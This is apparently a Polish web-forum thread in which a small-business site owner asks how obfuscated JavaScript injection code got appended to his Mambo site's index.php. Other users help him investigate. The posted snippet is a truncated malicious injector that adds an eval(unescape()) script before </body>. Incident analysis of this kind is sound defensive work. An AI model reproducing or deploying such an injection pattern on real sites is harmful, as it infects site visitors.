wlam na serwer czy moja wina? doklejka kodu do index.php

[sirapacz]

witam,

dzisiaj calkowicie przypadkiem odkrylem ze od 8 lipca wisi zamiast mojej strony firmowej strona owszem nadal firmowa ale z doklejonym kodem na koncu...

chcialbym ustalic zrodlo - nie tyle kto ale jak - doklejenia kodu.

fragment kodu strony jaki zostal doklejony to:

Kod:

<?php
function phpfake($buffer)
{
  $Exp='<script language="javascript">$="%64b%3d%22%3c7 (...tutaj reszta tego kodu - wycialem zbedny fragment...)74o%47MTS%74ri%6e%67%28);}%3b";eval(unescape($));document.write($);</script>';
  return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

do glowy by mi nie przyszlo sprawdzac gdyby nie to ze zainstalowalem sobie wczoraj avasta a dzis wlazlem na swoja strone...bum komunikat ze znalazl malware. Przejrzalem pobieznie pliki i wyglada ze tylko index.php w glownym katalogu zostal tak potraktowany.

czy ktos jest w stanie mnie naprowadzic na zrodlo problemu?
strona wisi na serwerze netartu (nazwa.pl) i jest na mambo pl 4.5.3

pytanie ogolne: czy na kontach takich jakie ma netart mozna z powodu bledu w kodzie strony uzyskac prawa zapisu do pliku jesli - po sprawdzeniu - prawo zapisu ma tylko owner? osobiscie mam wrazenie ze ktos zrobil wjazd do nazwa.pl ale nie chce rzucac zadnych oskarzen dopoki nie bede pewien ze to moja czy ich wina... celuje w moją ale hmmm chce sie poradzic doswiadczonych bardziej kolegow...

[Ormi]

A jakim cudem miałaby to być twoja wina? Sam dokleiłeś kod i o tym nie wiesz?
Mi to na atak wygląda. A nazwa tej zmiennej $Exp wygląda mi na skrót od exploit, a tak zmiennych raczej nikt w skryptach, które na swojej stronie zamieszcza nie nazywa

[sirapacz]

moja np bo gdzies zrobilem dziure w skrypcie ktoryms choc o ile pamietam to tam za duzo nie ma hmmmmm chyba nawet nic mojego autorstwa.
w kazdym badz razie zawsze istnieje szansa ze cos popieprzylem z prawami dostepu cczy cos ale jak sprawdzilem - sa takie jak powinny byc......

ps. atak to napewno ale którą drogą - czy przez blad w kodzie strony czy przez atak na serwer hostingowy - oczywiscie sie nie przyznaja a ja poki co nie mam jak im udowodnic ze to ich wina (jesli w ogole)

[blooregard]

ps. atak to napewno ale którą drogą - czy przez blad w kodzie strony czy przez atak na serwer hostingowy - oczywiscie sie nie przyznaja a ja poki co nie mam jak im udowodnic ze to ich wina (jesli w ogole)

Dopisac kod do pliku .php mozna chyba tylko bezpośrednio, czyli musiał ktos uzyskać dostęp do Twojego konta na ftp-ie, dopisać i zapisać plik z powrotem.
Zdalnie można wstawić kod .html czy też skrypt .js do skryptów, które gdzieś zapisują (czy to w bazie, czy w pliku) bez odfiltrowania znaczników html.

Na chwilę obecną nie znam sposobu na edycję pliku .php w podobny sposób.

[domdi]

zamiast document.write($);
daj alert($); i zobaczysz co jest ukryte pod tym zakodowanym adresem.

a mogło to zostać umieszczone bo może masz jakiegoś wirusa na kompie ktory w momencie podłączania się do ftp dopisuje kawałek kodu do pliku ? przeskanuj dobrze komputer

[Teeed]

i zarzuc pelnym kodem jezeli mozesz

[elceef]

Wklej na forum cały kod. Sprawdź logi serwera HTTP.